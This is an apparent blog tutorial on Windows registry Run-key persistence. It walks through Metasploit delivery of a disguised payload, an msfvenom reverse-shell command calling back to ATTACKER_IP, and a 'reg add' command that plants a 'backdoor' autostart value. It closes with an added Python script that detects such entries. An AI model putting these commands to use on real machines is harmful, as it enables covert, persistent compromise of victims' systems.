Registry Run Key Persistence
What is a registry?
The registry is a hierarchical database that stores configuration information about the Windows system and its applications, as shown in the picture below.
Components
Hives
You can think of hives as a way to categorize that information. There are 5 hives.
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
Contains information about the currently logged-on user.
HKEY_LOCAL_MACHINE
Contains information about the computer system.
HKEY_USERS
HKEY_CURRENT_CONFIG
What is a Run Key?
A Run key is a registry key whose values are executed when a user logs into the system. What we are going to do is create a value inside the Run key and point it to our backdoor/malware so that it runs every time a user logs in.
The Run keys are located at:
Under HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
Under HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
Hands on
The only tools I'm going to use are Metasploit and msfvenom. I have already created a malicious payload to infect the host; it is called svch0st.exe. What I'm going to do is set up an HTTP web server to distribute the malicious payload to the victim machine.
Next, we're going to set up the listener and execute the malicious payload.
Below, we can see that svch0st.exe (the malicious payload) is running and we have established a connection to the victim computer.
The next thing on the list is generating our backdoor using msfvenom. So, let's open another shell.
To generate a payload, we're going to use the following command structure:
msfvenom -p payload LHOST=ATTACKER_IP LPORT=ATTACKER_PORT -f format > name.exe
Then, we're going to use meterpreter to upload the backdoor (evilLink.exe) to the victim machine. Don't forget to escape /.
Currently, we're inside svch0st.exe, which is a 32-bit process. If we modify the registry of a 64-bit computer while we are in a 32-bit process, our changes will be redirected under:
HKEY_LOCAL_MACHINE\Software\Wow6432Node
The solution is to move into a 64-bit process and then modify the registry.
Now, we're going to open a command line inside meterpreter using the command "shell" and add a value to the registry key (HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run). This key will execute the backdoor whenever the system boots up or reboots.
Structure of the command:
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v backdoor /t REG_SZ /d "C:\Windows\Temp\evilLink.exe" /f
Now that we've added the value to the registry, let's reboot the victim machine and see if our registry change works.
While that is taking place, let's set up a listener on port 7777.
Boom, the victim machine automatically started the backdoor.
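From the defender's side, the value written above is exactly what a Run-key audit should catch. The following is an added Python example, not code from the original post: it parses saved `reg query` output for the Run/RunOnce keys listed above (including the Wow6432Node view that 32-bit processes are redirected into) and flags any value whose executable lives in a user-writable directory such as C:\Windows\Temp. The sample output is constructed, and the list of writable directories is an assumption to tune per environment.

```python
import re

# Directories a low-privilege process can write to (assumed list, tune per
# environment); legitimate autostart entries almost never launch from here.
WRITABLE_DIRS = ("\\windows\\temp\\", "\\appdata\\local\\temp\\",
                 "\\users\\public\\", "\\downloads\\")

# One "<name>    <type>    <data>" line as printed by reg query (4-space columns).
VALUE_LINE = re.compile(r"^\s+(.+?)\s{2,}(REG_[A-Z_]+)\s{2,}(.*?)\s*$")

def parse_reg_query(text):
    """Turn saved `reg query` output into (key, name, type, data) tuples."""
    entries, key = [], None
    for line in text.splitlines():
        if line.startswith("HK"):                 # key header line
            key = line.strip()
        elif key and (m := VALUE_LINE.match(line)):
            entries.append((key,) + m.groups())
    return entries

def launch_path(data):
    """Extract the executable from a command line, honouring a quoted path."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:data.find('"', 1)]
    return data.split(" ", 1)[0]

def suspicious_entries(text):
    """Flag autostart values whose executable lives in a user-writable dir."""
    flagged = []
    for key, name, vtype, data in parse_reg_query(text):
        path = launch_path(data).lower()
        if any(d in path for d in WRITABLE_DIRS):
            flagged.append({"key": key, "name": name, "path": path})
    return flagged

# Constructed sample output: two legitimate entries and the post's backdoor value.
SAMPLE = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\\system32\\SecurityHealthSystray.exe
    backdoor    REG_SZ    C:\\Windows\\Temp\\evilLink.exe

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
    OneDrive    REG_SZ    "C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background
"""

if __name__ == "__main__":
    for hit in suspicious_entries(SAMPLE):
        print(f"[!] {hit['key']} -> {hit['name']} launches {hit['path']}")
```

Run it against the output of `reg query <key>` for each Run and RunOnce key (HKCU, HKLM and HKLM\Software\Wow6432Node); a hit such as the `backdoor` value pointing into C:\Windows\Temp is the artifact this persistence technique leaves behind.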